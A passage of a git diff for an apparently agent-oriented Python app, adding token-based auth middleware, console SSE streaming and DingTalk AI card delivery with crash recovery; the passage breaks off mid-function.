+ expected_sig = hmac.new( + secret.encode(), + payload_b64.encode(), + hashlib.sha256, + ).hexdigest() + if not hmac.compare_digest(sig, expected_sig): + return None + payload = json.loads(base64.urlsafe_b64decode(payload_b64)) + if payload.get("exp", 0) < time.time(): + return None + return payload.get("sub") + except (json.JSONDecodeError, KeyError, ValueError, TypeError) as exc: + logger.debug("Token verification failed: %s", exc) + return None + + +# --------------------------------------------------------------------------- +# Auth data persistence (auth.json in SECRET_DIR) +# --------------------------------------------------------------------------- + + +def _load_auth_data() -> dict: + """Load ``auth.json`` from ``SECRET_DIR``. + + Returns the parsed dict, or a sentinel with ``_auth_load_error`` + set to ``True`` when the file exists but cannot be read/parsed so + that callers can fail closed instead of silently bypassing auth. + """ + if AUTH_FILE.is_file(): + try: + with open(AUTH_FILE, "r", encoding="utf-8") as f: + return json.load(f) + except (json.JSONDecodeError, OSError) as exc: + logger.error("Failed to load auth file %s: %s", AUTH_FILE, exc) + return {"_auth_load_error": True} + return {} + + +def _save_auth_data(data: dict) -> None: + """Save ``auth.json`` to ``SECRET_DIR`` with restrictive permissions.""" + _prepare_secret_parent(AUTH_FILE) + with open(AUTH_FILE, "w", encoding="utf-8") as f: + json.dump(data, f, indent=2, ensure_ascii=False) + _chmod_best_effort(AUTH_FILE, 0o600) + + +def is_auth_enabled() -> bool: + """Check whether authentication is enabled via environment variable. + + Returns ``True`` when ``COPAW_AUTH_ENABLED`` is set to a truthy + value (``true``, ``1``, ``yes``). The presence of a registered + user is checked separately by the middleware so that the first + user can still reach the registration page. + """ + env_flag = os.environ.get("COPAW_AUTH_ENABLED", "").strip().lower() + return env_flag in ("true", "1", "yes") + + +def has_registered_users() -> bool: + """Return ``True`` if a user has been registered.""" + data = _load_auth_data() + return bool(data.get("user")) + + +# --------------------------------------------------------------------------- +# Registration (single-user) +# --------------------------------------------------------------------------- + + +def register_user(username: str, password: str) -> Optional[str]: + """Register the single user account. + + Returns a token on success, ``None`` if a user already exists. + """ + data = _load_auth_data() + + # Only one user allowed + if data.get("user"): + return None + + pw_hash, salt = _hash_password(password) + data["user"] = { + "username": username, + "password_hash": pw_hash, + "password_salt": salt, + } + + # Ensure jwt_secret exists + if not data.get("jwt_secret"): + data["jwt_secret"] = secrets.token_hex(32) + + _save_auth_data(data) + logger.info("User '%s' registered", username) + return create_token(username) + + +# --------------------------------------------------------------------------- +# Authentication +# --------------------------------------------------------------------------- + + +def authenticate(username: str, password: str) -> Optional[str]: + """Authenticate *username* / *password*. Returns a token if valid.""" + data = _load_auth_data() + user = data.get("user") + if not user: + return None + if user.get("username") != username: + return None + stored_hash = user.get("password_hash", "") + stored_salt = user.get("password_salt", "") + if ( + stored_hash + and stored_salt + and verify_password(password, stored_hash, stored_salt) + ): + return create_token(username) + return None + + +# --------------------------------------------------------------------------- +# FastAPI middleware +# --------------------------------------------------------------------------- + + +class AuthMiddleware(BaseHTTPMiddleware): + """Middleware that checks Bearer token on protected routes.""" + + async def dispatch( + self, + request: Request, + call_next, + ) -> Response: + """Check Bearer token on protected API routes; skip public paths.""" + if self._should_skip_auth(request): + return await call_next(request) + + token = self._extract_token(request) + if not token: + return Response( + content=json.dumps({"detail": "Not authenticated"}), + status_code=401, + media_type="application/json", + ) + + user = verify_token(token) + if user is None: + return Response( + content=json.dumps( + {"detail": "Invalid or expired token"}, + ), + status_code=401, + media_type="application/json", + ) + + request.state.user = user + return await call_next(request) + + @staticmethod + def _should_skip_auth(request: Request) -> bool: + """Return ``True`` when the request does not require auth.""" + if not is_auth_enabled() or not has_registered_users(): + return True + + path = request.url.path + + if request.method == "OPTIONS": + return True + + if path in _PUBLIC_PATHS or any( + path.startswith(p) for p in _PUBLIC_PREFIXES + ): + return True + + # Only protect /api/ routes + if not path.startswith("/api/"): + return True + + # Allow localhost requests without auth (CLI runs locally) + client_host = request.client.host if request.client else "" + return client_host in ("127.0.0.1", "::1") + + @staticmethod + def _extract_token(request: Request) -> Optional[str]: + """Extract Bearer token from header or WebSocket query param.""" + auth_header = request.headers.get("Authorization", "") + if auth_header.startswith("Bearer "): + return auth_header[7:] + if "upgrade" in request.headers.get("connection", "").lower(): + return request.query_params.get("token") + return None diff --git a/src/copaw/app/channels/base.py b/src/copaw/app/channels/base.py index c4e466bc4..993fa9906 100644 --- a/src/copaw/app/channels/base.py +++ b/src/copaw/app/channels/base.py @@ -34,6 +34,7 @@ from .renderer import MessageRenderer, RenderStyle from .schema import ChannelType +from ...config.utils import load_config # Optional callback to enqueue payload (set by manager) EnqueueCallback = Optional[Callable[[Any], None]] @@ -99,10 +100,17 @@ def __init__( self.deny_message = deny_message or "" self.require_mention = require_mention self._enqueue: EnqueueCallback = None + cfg = load_config() + internal_tools = frozenset( + name + for name, tc in cfg.tools.builtin_tools.items() + if not tc.display_to_user + ) self._render_style = RenderStyle( show_tool_details=show_tool_details, filter_tool_messages=filter_tool_messages, filter_thinking=filter_thinking, + internal_tools=internal_tools, ) self._renderer = MessageRenderer(self._render_style) self._http: Optional[Any] = None @@ -122,15 +130,15 @@ def _is_native_payload(self, payload: Any) -> bool: def get_debounce_key(self, payload: Any) -> str: """ Key for time debounce (same key = same conversation). - Override for channel-specific keys (e.g. short conversation_id). + Delegates to ``resolve_session_id`` so every channel gets + session-scoped isolation automatically. """ if isinstance(payload, dict): + sender_id = payload.get("sender_id") or "" meta = payload.get("meta") or {} - return ( - payload.get("session_id") - or meta.get("conversation_id") - or payload.get("sender_id") - or "" + return payload.get("session_id") or self.resolve_session_id( + sender_id, + meta, ) return getattr(payload, "session_id", "") or "" @@ -154,6 +162,7 @@ def merge_native_items(self, items: List[Any]) -> Any: "reply_loop", "incoming_message", "conversation_id", + "message_id", ): if k in m: merged_meta[k] = m[k] @@ -228,6 +237,13 @@ def _content_has_text(self, contents: List[Any]) -> bool: return True return False + def _content_has_audio(self, contents: List[Any]) -> bool: + """True if contents has at least one AUDIO block.""" + return any( + getattr(c, "type", None) == ContentType.AUDIO + for c in (contents or []) + ) + def _apply_no_text_debounce( self, session_id: str, @@ -236,8 +252,19 @@ def _apply_no_text_debounce( """ Debounce: if content has no text, buffer and return (False, []). If has text, return (True, merged) with any buffered content prepended. + Audio-only messages bypass debounce and are processed immediately + (voice messages are standalone user input, not partial uploads). """ if not self._content_has_text(content_parts): + if self._content_has_audio(content_parts): + # Audio-only messages (e.g. voice messages) should be + # processed immediately — they are complete user input. + pending = self._pending_content_by_session.pop( + session_id, + [], + ) + merged = pending + list(content_parts) + return (True, merged) self._pending_content_by_session.setdefault( session_id, [], @@ -344,7 +371,7 @@ def build_agent_request_from_user_content( if not content_parts: content_parts = [ - TextContent(type=ContentType.TEXT, text=""), + TextContent(type=ContentType.TEXT, text=" "), ] msg = Message( type=MessageType.MESSAGE, diff --git a/src/copaw/app/channels/console/channel.py b/src/copaw/app/channels/console/channel.py index 26d480c42..4498c1fef 100644 --- a/src/copaw/app/channels/console/channel.py +++ b/src/copaw/app/channels/console/channel.py @@ -5,17 +5,18 @@ A lightweight channel that prints all agent responses to stdout. Messages are sent to the agent via the standard AgentApp ``/agent/process`` -endpoint. This channel only handles the **output** side: whenever a -completed message event or a proactive send arrives, it is pretty-printed -to the terminal. +endpoint or via POST /console/chat. This channel handles the **output** side: +whenever a completed message event or a proactive send arrives, it is +pretty-printed to the terminal. """ from __future__ import annotations import logging import os import sys +import json from datetime import datetime -from typing import Any, Dict, List, Optional +from typing import Any, AsyncGenerator, Dict, List, Optional from agentscope_runtime.engine.schemas.agent_schemas import RunStatus @@ -139,6 +140,19 @@ def from_config( filter_thinking=filter_thinking, ) + def resolve_session_id( + self, + sender_id: str, + channel_meta: Optional[dict] = None, + ) -> str: + """Resolve session_id: use explicit meta['session_id'] when provided + (e.g. from the HTTP /console/chat API), otherwise fall back to + 'console:'. + """ + if channel_meta and channel_meta.get("session_id"): + return channel_meta["session_id"] + return f"{self.channel}:{sender_id}" + def build_agent_request_from_native(self, native_payload: Any) -> Any: """ Build AgentRequest from console native payload (dict with @@ -161,8 +175,8 @@ def build_agent_request_from_native(self, native_payload: Any) -> Any: request.channel_meta = meta return request - async def consume_one(self, payload: Any) -> None: - """Process one payload (AgentRequest or native dict) from queue.""" + async def stream_one(self, payload: Any) -> AsyncGenerator[str, None]: + """Process one payload and yield SSE-formatted events""" if isinstance(payload, dict) and "content_parts" in payload: session_id = self.resolve_session_id( payload.get("sender_id") or "", @@ -212,6 +226,14 @@ async def consume_one(self, payload: Any) -> None: ev_type, ) + if hasattr(event, "model_dump_json"): + data = event.model_dump_json() + elif hasattr(event, "json"): + data = event.json() + else: + data = json.dumps({"text": str(event)}) + yield f"data: {data}\n\n" + if obj == "message" and status == RunStatus.Completed: parts = self._message_to_content_parts(event) self._print_parts(parts, ev_type) @@ -242,6 +264,11 @@ async def consume_one(self, payload: Any) -> None: err_msg = str(e).strip() or "An error occurred while processing." self._print_error(err_msg) + async def consume_one(self, payload: Any) -> None: + """Process one payload; drain stream_one (queue/terminal).""" + async for _ in self.stream_one(payload): + pass + # ── pretty-print helpers ──────────────────────────────────────── def _print_parts( diff --git a/src/copaw/app/channels/dingtalk/ai_card.py b/src/copaw/app/channels/dingtalk/ai_card.py new file mode 100644 index 000000000..a7f38991a --- /dev/null +++ b/src/copaw/app/channels/dingtalk/ai_card.py @@ -0,0 +1,104 @@ +# -*- coding: utf-8 -*- +"""DingTalk AI Card helpers.""" + +from __future__ import annotations + +import json +import re +import time +from dataclasses import asdict, dataclass +from pathlib import Path +from typing import Dict, List + +PROCESSING = "1" +INPUTING = "2" +FINISHED = "3" +FAILED = "5" +_TERMINAL_STATES = {FINISHED, FAILED} + + +@dataclass +class ActiveAICard: + card_instance_id: str + access_token: str + conversation_id: str + account_id: str + store_path: str + created_at: int + last_updated: int + state: str + last_streamed_content: str = "" + + +class AICardPendingStore: + """Persist active inbound cards for crash recovery.""" + + def __init__(self, path: Path): + self._path = path + + @property + def path(self) -> Path: + return self._path + + def load(self) -> List[dict]: + if not self._path.is_file(): + return [] + try: + data = json.loads(self._path.read_text(encoding="utf-8")) + pending = ( + data.get("pending_cards") if isinstance(data, dict) else [] + ) + return pending if isinstance(pending, list) else [] + except Exception: + return [] + + def save(self, cards: Dict[str, ActiveAICard]) -> None: + self._path.parent.mkdir(parents=True, exist_ok=True) + pending_cards = [ + { + "account_id": v.account_id, + "card_instance_id": v.card_instance_id, + "conversation_id": v.conversation_id, + "created_at": v.created_at, + "last_updated": v.last_updated, + "state": v.state, + } + for v in cards.values() + if v.state not in _TERMINAL_STATES + ] + data = { + "version": 1, + "updated_at": int(time.time() * 1000), + "pending_cards": pending_cards, + } + tmp = self._path.with_suffix(".tmp") + tmp.write_text( + json.dumps(data, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + tmp.replace(self._path) + + +def is_group_conversation(conversation_id: str) -> bool: + return (conversation_id or "").startswith("cid") + + +def thinking_or_tool_to_card_text(text: str, title: str) -> str: + body = (text or "")[:500] + if len(text or "") > 500: + body += "…" + lines = body.splitlines() or [""] + fixed = [] + for ln in lines: + ln = re.sub(r"^_$", "*", ln) + ln = re.sub(r"_$", "*", ln) + fixed.append(f"> {ln}") + return f"{title}\n" + "\n".join(fixed) + + +def to_pending_record(card: ActiveAICard) -> dict: + data = asdict(card) + data.pop("access_token", None) + data.pop("store_path", None) + data.pop("last_streamed_content", None) + return data diff --git a/src/copaw/app/channels/dingtalk/channel.py b/src/copaw/app/channels/dingtalk/channel.py index 8491df400..7c913e200 100644 --- a/src/copaw/app/channels/dingtalk/channel.py +++ b/src/copaw/app/channels/dingtalk/channel.py @@ -22,8 +22,10 @@ import mimetypes import os import threading +import types from pathlib import Path from typing import TYPE_CHECKING, Any, Dict, List, Optional +from uuid import uuid4 from urllib.parse import urlparse import aiohttp @@ -34,6 +36,7 @@ from ..utils import file_url_to_local_path from ....config.config import DingTalkConfig as DingTalkChannelConfig from ....config.utils import get_config_path +from ....constant import DEFAULT_MEDIA_DIR from ..base import ( BaseChannel, @@ -44,7 +47,12 @@ ) from .constants import ( + AI_CARD_PROCESSING_TEXT, + AI_CARD_RECOVERY_FINAL_TEXT, + AI_CARD_STREAM_MIN_INTERVAL_SECONDS, + AI_CARD_TOKEN_PREEMPTIVE_REFRESH_SECONDS, DINGTALK_TOKEN_TTL_SECONDS, + SENT_VIA_AI_CARD, SENT_VIA_WEBHOOK, ) from .content_utils import ( @@ -54,6 +62,14 @@ ) from .handler import DingTalkChannelHandler from . import markdown as dingtalk_markdown +from .ai_card import ( + FAILED, + FINISHED, + INPUTING, + PROCESSING, + AICardPendingStore, + ActiveAICard, +) from .utils import guess_suffix_from_file_content if TYPE_CHECKING: @@ -62,6 +78,23 @@ logger = logging.getLogger(__name__) +def _make_safe_dingtalk_stream_logger(base: logging.Logger) -> logging.Logger: + """Patch logger.exception to tolerate malformed msg/args usage.""" + if getattr(base, "_copaw_safe_exception_patched", False): + return base + + def _safe_exception(self: logging.Logger, msg, *args, **kwargs): + if args and "%" not in str(msg): + msg = f"{msg}: " + " ".join(str(item) for item in args) + args = () + kwargs.setdefault("exc_info", True) + self.error(msg, *args, **kwargs) + + base.exception = types.MethodType(_safe_exception, base) # type: ignore[assignment] + setattr(base, "_copaw_safe_exception_patched", True) + return base + + class DingTalkChannel(BaseChannel): """DingTalk Channel: DingTalk Stream -> Incoming -> to_agent_request -> process -> send_response -> DingTalk reply. @@ -85,7 +118,12 @@ def __init__( client_id: str, client_secret: str, bot_prefix: str, - media_dir: str = "~/.copaw/media", + message_type: str = "markdown", + card_template_id: str = "", + card_template_key: str = "content", + robot_code: str = "", + media_dir: str = "", + workspace_dir: Path | None = None, on_reply_sent: OnReplySent = None, show_tool_details: bool = True, filter_tool_messages: bool = False, @@ -112,7 +150,26 @@ def __init__( self.client_id = client_id self.client_secret = client_secret self.bot_prefix = bot_prefix - self._media_dir = Path(media_dir).expanduser() + self.message_type = (message_type or "markdown").strip().lower() + self.card_template_id = card_template_id or "" + self.card_template_key = card_template_key or "content" + self.robot_code = robot_code or self.client_id + self._active_cards: Dict[str, ActiveAICard] = {} + self._active_cards_lock = asyncio.Lock() + self._card_store = AICardPendingStore( + get_config_path().parent / "dingtalk-active-cards.json", + ) + self._workspace_dir = ( + Path(workspace_dir).expanduser() if workspace_dir else None + ) + # Use workspace-specific media dir if workspace_dir is provided + if not media_dir and self._workspace_dir: + self._media_dir = self._workspace_dir / "media" + elif media_dir: + self._media_dir = Path(media_dir).expanduser() + else: + self._media_dir = DEFAULT_MEDIA_DIR + self._media_dir.mkdir(parents=True, exist_ok=True) self._client: Optional[dingtalk_stream.DingTalkStreamClient] = None self._loop: Optional[asyncio.AbstractEventLoop] = None @@ -156,7 +213,15 @@ def from_env( client_id=os.getenv("DINGTALK_CLIENT_ID", ""), client_secret=os.getenv("DINGTALK_CLIENT_SECRET", ""), bot_prefix=os.getenv("DINGTALK_BOT_PREFIX", "[BOT] "), - media_dir=os.getenv("DINGTALK_MEDIA_DIR", "~/.copaw/media"), + message_type=os.getenv("DINGTALK_MESSAGE_TYPE", "markdown"), + card_template_id=os.getenv("DINGTALK_CARD_TEMPLATE_ID", ""), + card_template_key=os.getenv( + "DINGTALK_CARD_TEMPLATE_KEY", + "content", + ), + robot_code=os.getenv("DINGTALK_ROBOT_CODE", "") + or os.getenv("DINGTALK_CLIENT_ID", ""), + media_dir=os.getenv("DINGTALK_MEDIA_DIR", ""), on_reply_sent=on_reply_sent, dm_policy=os.getenv("DINGTALK_DM_POLICY", "open"), group_policy=os.getenv("DINGTALK_GROUP_POLICY", "open"), @@ -174,6 +239,7 @@ def from_config( show_tool_details: bool = True, filter_tool_messages: bool = False, filter_thinking: bool = False, + workspace_dir: Path | None = None, ) -> "DingTalkChannel": return cls( process=process, @@ -181,7 +247,14 @@ def from_config( client_id=config.client_id or "", client_secret=config.client_secret or "", bot_prefix=config.bot_prefix or "[BOT] ", - media_dir=config.media_dir or "~/.copaw/media", + message_type=getattr(config, "message_type", "markdown"), + card_template_id=getattr(config, "card_template_id", ""), + card_template_key=getattr(config, "card_template_key", "content"), + robot_code=( + getattr(config, "robot_code", "") or config.client_id or "" + ), + media_dir=config.media_dir or "", + workspace_dir=workspace_dir, on_reply_sent=on_reply_sent, show_tool_details=show_tool_details, filter_tool_messages=filter_tool_messages, @@ -257,7 +330,13 @@ def _route_from_handle(self, to_handle: str) -> dict: return {"webhook_key": s} if s else {} def _session_webhook_store_path(self) -> Path: - """Path to persist session webhook mapping (for cron after restart).""" + """Path to persist session webhook mapping (for cron after restart). + + Uses agent workspace directory if available, otherwise falls back + to global config directory for backward compatibility. + """ + if self._workspace_dir: + return self._workspace_dir / "dingtalk_session_webhooks.json" return get_config_path().parent / "dingtalk_session_webhooks.json" def _load_session_webhook_store_from_disk(self) -> None: @@ -390,6 +469,19 @@ def _release_message_ids(self, msg_ids: List[str]) -> None: len(self._processing_message_ids), ) + @staticmethod + def _safe_set_future_result( + future: "asyncio.Future[str]", + text: str, + ) -> None: + """Set future result only if not already done (idempotent). + + Guards against InvalidStateError when _ack_early already resolved + the future before _reply_sync_batch is called at stream end. + """ + if not future.done(): + future.set_result(text) + def _reply_sync(self, meta: Dict[str, Any], text: str) -> None: """Resolve reply_future on the stream thread's loop so process() can continue and reply. @@ -398,7 +490,11 @@ def _reply_sync(self, meta: Dict[str, Any], text: str) -> None: reply_future = meta.get("reply_future") if reply_loop is None or reply_future is None: return - reply_loop.call_soon_threadsafe(reply_future.set_result, text) + reply_loop.call_soon_threadsafe( + self._safe_set_future_result, + reply_future, + text, + ) if "_message_ids" in meta: ids = meta["_message_ids"] else: @@ -414,7 +510,8 @@ def _reply_sync_batch(self, meta: Dict[str, Any], text: str) -> None: for reply_loop, reply_future in lst: if reply_loop and reply_future: reply_loop.call_soon_threadsafe( - reply_future.set_result, + self._safe_set_future_result, + reply_future, text, ) ids = meta["_message_ids"] if "_message_ids" in meta else [] @@ -422,6 +519,42 @@ def _reply_sync_batch(self, meta: Dict[str, Any], text: str) -> None: else: self._reply_sync(meta, text) + def _ack_early(self, meta: Dict[str, Any], text: str) -> None: + """Resolve reply_futures immediately for streaming paths (AI card / + sessionWebhook) WITHOUT releasing dedup msg_ids. + + Unblocks the DingTalk stream callback handler so it can return + STATUS_OK to the SDK quickly, preventing DingTalk retry storms + during long LLM generation. Dedup msg_ids are released later by + _reply_sync_batch once streaming fully completes, so any DingTalk + re-delivery before that point is still correctly rejected. + """ + lst = meta.get("_reply_futures_list") or [] + if lst: + for reply_loop, reply_future in lst: + if reply_loop and reply_future: + reply_loop.call_soon_threadsafe( + self._safe_set_future_result, + reply_future, + text, + ) + futures_count = len(lst) + else: + reply_loop = meta.get("reply_loop") + reply_future = meta.get("reply_future") + if reply_loop and reply_future: + reply_loop.call_soon_threadsafe( + self._safe_set_future_result, + reply_future, + text, + ) + futures_count = 1 if meta.get("reply_future") else 0 + logger.debug( + "dingtalk _ack_early: text=%r futures_count=%s", + text, + futures_count, + ) + def _get_session_webhook( self, meta: Optional[Dict[str, Any]], @@ -1192,10 +1325,6 @@ async def send_content_parts( else: await self.send(to_handle, body.strip() or prefix, meta) - def get_debounce_key(self, payload: Any) -> str: - """Use short conversation_id or channel:sender for time debounce.""" - return self._debounce_key(payload) - def merge_native_items(self, items: List[Any]) -> Any: """Merge payloads (content_parts + meta) for DingTalk.""" return self._merge_native(items) @@ -1317,6 +1446,47 @@ async def _process_one_request( last_response = None accumulated_parts: list = [] event_count = 0 + # _acked_early: reply_future already resolved so DingTalk handler + # returned STATUS_OK quickly; msg_ids still held for dedup until + # streaming fully completes (_reply_sync_batch at the end). + _acked_early = False + conversation_id = str(meta.get("conversation_id") or "") + use_ai_card = self._ai_card_enabled() and bool(conversation_id) + logger.info( + "dingtalk ai card gate: enabled=%s " + "message_type=%s has_template=%s " + "has_robot=%s has_conversation=%s", + use_ai_card, + self.message_type, + bool(self.card_template_id), + bool(self.robot_code), + bool(conversation_id), + ) + card: Optional[ActiveAICard] = None + card_full_text = "" + if use_ai_card: + try: + card = await self._create_ai_card( + conversation_id, + meta=meta, + inbound=True, + ) + # AI card created: ACK DingTalk immediately so the stream + # callback handler returns STATUS_OK without waiting for + # the full LLM response. This stops DingTalk retry storms + # on long-form generations. Dedup msg_ids are kept until + # streaming finishes (see _reply_sync_batch below). + self._ack_early(reply_meta, SENT_VIA_AI_CARD) + _acked_early = True + logger.info( + "dingtalk _ack_early: AI card created, " + "handler unblocked early", + ) + except Exception: + logger.exception( + "dingtalk create ai card failed, fallback to markdown", + ) + use_ai_card = False # Store sessionWebhook (keyed by conversation). if session_webhook: @@ -1355,47 +1525,68 @@ async def _process_one_request( f"dingtalk completed message: type={ev_type} " f"parts_count={len(parts)}", ) - if use_multi and parts and session_webhook: - body = self._parts_to_single_text( - parts, - bot_prefix="", + body = self._parts_to_single_text( + parts, + bot_prefix="", + ) + if use_ai_card and card: + next_card_text = self._merge_ai_card_text( + card_full_text, + body, ) + try: + if next_card_text != card_full_text: + card_full_text = next_card_text + await self._stream_ai_card( + card, + card_full_text, + finalize=False, + ) + except Exception: + logger.exception( + "dingtalk stream ai card failed," + " fallback to markdown", + ) + await self._mark_card_failed(conversation_id) + use_ai_card = False + fallback_body = body.strip() or card_full_text.strip() + if use_multi and session_webhook and fallback_body: + await self._send_via_session_webhook( + session_webhook, + fallback_body, + bot_prefix="", + ) + else: + accumulated_parts.extend(parts) + elif use_multi and parts and session_webhook: if body.strip(): await self._send_via_session_webhook( session_webhook, body.strip(), bot_prefix="", ) + # First webhook message sent: ACK DingTalk early so + # handler returns STATUS_OK without waiting for the + # full LLM response. + if not _acked_early: + self._ack_early(reply_meta, SENT_VIA_WEBHOOK) + _acked_early = True + logger.info( + "dingtalk _ack_early: first webhook chunk " + "sent, handler unblocked early", + ) _media_types = ( ContentType.IMAGE, ContentType.FILE, ContentType.VIDEO, ContentType.AUDIO, ) - media_count = sum( - 1 - for p in parts - if getattr(p, "type", None) in _media_types - ) - if media_count: - logger.info( - "dingtalk consume_loop: " - "sending %s media " - "parts via webhook", - media_count, - ) for part in parts: if getattr(part, "type", None) in _media_types: - ok = await self._send_media_part_via_webhook( + await self._send_media_part_via_webhook( session_webhook, part, ) - logger.info( - "dingtalk consume_loop: media part " - "type=%s result=%s", - getattr(part, "type", None), - ok, - ) else: accumulated_parts.extend(parts) elif obj == "response": @@ -1409,7 +1600,23 @@ async def _process_one_request( ) err_msg = self._get_response_error_message(last_response) - if err_msg: + if use_ai_card and card: + final_text = card_full_text or self._build_ai_card_initial_text() + try: + if err_msg: + final_text = self.bot_prefix + f"Error: {err_msg}" + await self._stream_ai_card(card, final_text, finalize=True) + except Exception: + logger.exception("dingtalk finalize ai card failed") + await self._mark_card_failed(conversation_id) + if use_multi and session_webhook: + await self._send_via_session_webhook( + session_webhook, + final_text, + bot_prefix="", + ) + self._reply_sync_batch(reply_meta, SENT_VIA_AI_CARD) + elif err_msg: err_text = self.bot_prefix + f"Error: {err_msg}" if use_multi and session_webhook: await self._send_via_session_webhook( @@ -1452,14 +1659,6 @@ async def _process_one_request( request.session_id or f"{self.channel}:{request.user_id}", ) - def _debounce_key(self, native: Any) -> str: - payload = native if isinstance(native, dict) else {} - meta = payload.get("meta") or {} - cid = meta.get("conversation_id") or "" - if cid: - return short_session_id_from_conversation_id(str(cid)) - return f"{self.channel}:{payload.get('sender_id', '')}" - def _merge_native(self, items: list) -> dict: """Merge multiple native payloads into one (content_parts + meta).""" if not items: @@ -1600,7 +1799,12 @@ async def start(self) -> None: self.client_id, self.client_secret, ) - self._client = dingtalk_stream.DingTalkStreamClient(credential) + self._client = dingtalk_stream.DingTalkStreamClient( + credential, + logger=_make_safe_dingtalk_stream_logger( + logging.getLogger("copaw.dingtalk.stream") + ), + ) enqueue_cb = getattr(self, "_enqueue", None) internal_handler = DingTalkChannelHandler( main_loop=self._loop, @@ -1622,6 +1826,7 @@ async def start(self) -> None: self._stream_thread.start() if self._http is None: self._http = aiohttp.ClientSession() + await self._recover_active_cards() async def stop(self) -> None: if not self.enabled: @@ -1639,11 +1844,390 @@ async def stop(self) -> None: ) self._debounce_timers.clear() self._debounce_pending.clear() + # best-effort finalize active cards before stopping + for conv_id in list(self._active_cards.keys()): + try: + card = self._active_cards.get(conv_id) + if card and card.state not in (FINISHED, FAILED): + await self._stream_ai_card( + card, + card.last_streamed_content + or AI_CARD_RECOVERY_FINAL_TEXT, + finalize=True, + ) + except Exception: + logger.debug( + "dingtalk finalize active card on stop failed", + exc_info=True, + ) if self._http is not None: await self._http.close() self._http = None self._client = None + # Note: dingtalk_stream SDK has AICardReplier/CardReplier, + # but those APIs are request/reply oriented and tied to ChatbotMessage + # context; here we keep raw OpenAPI calls to support proactive recovery + # and persisted card lifecycles across restarts. + def _ai_card_enabled(self) -> bool: + return ( + self.message_type == "card" + and bool(self.card_template_id) + and bool(self.robot_code) + ) + + def _build_ai_card_initial_text(self) -> str: + return self.bot_prefix + AI_CARD_PROCESSING_TEXT + + def _merge_ai_card_text(self, current: str, incoming: str) -> str: + current = (current or "").strip() + incoming = (incoming or "").strip() + if not incoming: + return current + if not current: + return incoming + if incoming == current or current.endswith(incoming): + return current + return f"{current}\n{incoming}".strip() + + async def _save_active_cards(self) -> None: + async with self._active_cards_lock: + self._card_store.save(self._active_cards) + + async def _mark_card_failed(self, conversation_id: str) -> None: + async with self._active_cards_lock: + card = self._active_cards.get(conversation_id) + if card: + card.state = FAILED + card.last_updated = int(time.time() * 1000) + self._active_cards.pop(conversation_id, None) + self._card_store.save(self._active_cards) + + async def _create_ai_card( + self, + conversation_id: str, + meta: Optional[Dict[str, Any]] = None, + inbound: bool = True, + ) -> Optional[ActiveAICard]: + if not self._ai_card_enabled() or self._http is None: + logger.warning( + "dingtalk create ai card skipped: enabled=%s http_ready=%s " + "message_type=%s has_template=%s has_robot=%s", + self._ai_card_enabled(), + self._http is not None, + self.message_type, + bool(self.card_template_id), + bool(self.robot_code), + ) + return None + token = await self._get_access_token() + card_instance_id = f"card_{uuid4()}" + meta = meta or {} + incoming_message = meta.get("incoming_message") + sender_staff_id = ( + meta.get("sender_staff_id") + or getattr(incoming_message, "sender_staff_id", None) + or getattr(incoming_message, "senderStaffId", None) + or "" + ) + is_group = bool(meta.get("is_group")) + create_payload: Dict[str, Any] = { + "cardTemplateId": self.card_template_id, + "outTrackId": card_instance_id, + "cardData": {"cardParamMap": {self.card_template_key: ""}}, + "callbackType": "STREAM", + "imGroupOpenSpaceModel": {"supportForward": True}, + "imRobotOpenSpaceModel": {"supportForward": True}, + } + + headers = { + "Content-Type": "application/json", + "x-acs-dingtalk-access-token": token, + } + create_url = "https://api.dingtalk.com/v1.0/card/instances" + logger.info( + "dingtalk create ai card: conversation_id=%s is_group=%s " + "sender_staff_id=%s template_id=%s inbound=%s", + conversation_id, + is_group, + sender_staff_id, + self.card_template_id, + inbound, + ) + async with self._http.post( + create_url, + json=create_payload, + headers=headers, + ) as resp: + body = await resp.text() + logger.info( + "dingtalk create ai card response: status=%s body=%s", + resp.status, + body[:1000], + ) + if resp.status >= 400: + raise RuntimeError( + "create ai card failed" + f" status={resp.status}" + f" body={body[:500]}", + ) + + if is_group: + open_space_id = f"dtv1.card//IM_GROUP.{conversation_id}" + deliver_payload: Dict[str, Any] = { + "outTrackId": card_instance_id, + "userIdType": 1, + "openSpaceId": open_space_id, + "imGroupOpenDeliverModel": { + "robotCode": self.robot_code, + }, + } + else: + if not sender_staff_id: + raise RuntimeError( + "create ai card failed:" + " missing sender_staff_id for IM_ROBOT", + ) + open_space_id = f"dtv1.card//IM_ROBOT.{sender_staff_id}" + deliver_payload = { + "outTrackId": card_instance_id, + "userIdType": 1, + "openSpaceId": open_space_id, + "imRobotOpenDeliverModel": { + "spaceType": "IM_ROBOT", + }, + } + + deliver_url = "https://api.dingtalk.com/v1.0/card/instances/deliver" + logger.info( + "dingtalk deliver ai card: conversation_id=%s open_space_id=%s", + conversation_id, + open_space_id, + ) + async with self._http.post( + deliver_url, + json=deliver_payload, + headers=headers, + ) as resp: + deliver_body = await resp.text() + logger.info( + "dingtalk deliver ai card response: status=%s body=%s", + resp.status, + deliver_body[:1000], + ) + if resp.status >= 400: + raise RuntimeError( + "deliver ai card failed" + f" status={resp.status}" + f" body={deliver_body[:500]}", + ) + + try: + deliver_data = json.loads(deliver_body) if deliver_body else {} + except json.JSONDecodeError: + deliver_data = {} + result = ( + deliver_data.get("result") + if isinstance(deliver_data, dict) + else None + ) + if isinstance(result, list): + deliver_results = result + elif isinstance(result, dict): + deliver_results = result.get("deliverResults") + else: + deliver_results = None + if isinstance(deliver_results, list): + failed = [ + item + for item in deliver_results + if isinstance(item, dict) and not item.get("success", False) + ] + if failed: + err = failed[0] + raise RuntimeError( + "deliver ai card failed: " + f"spaceId={err.get('spaceId')} " + f"spaceType={err.get('spaceType')} " + f"errorMsg={err.get('errorMsg')}", + ) + logger.info( + "dingtalk create ai card ok:" + " conversation_id=%s card_instance_id=%s", + conversation_id, + card_instance_id, + ) + + now_ms = int(time.time() * 1000) + card = ActiveAICard( + card_instance_id=card_instance_id, + access_token=token, + conversation_id=conversation_id, + account_id="default", + store_path=str(self._card_store.path), + created_at=now_ms, + last_updated=now_ms, + state=PROCESSING, + last_streamed_content="", + ) + async with self._active_cards_lock: + self._active_cards[conversation_id] = card + if inbound: + self._card_store.save(self._active_cards) + return card + + async def _stream_ai_card( + self, + card: ActiveAICard, + content: str, + finalize: bool = False, + ) -> bool: + if self._http is None or card.state in (FINISHED, FAILED): + return False + + content = (content or "").strip() + if not content: + return False + + now_ms = int(time.time() * 1000) + if not finalize: + if content == (card.last_streamed_content or "").strip(): + return False + if ( + card.last_updated + and 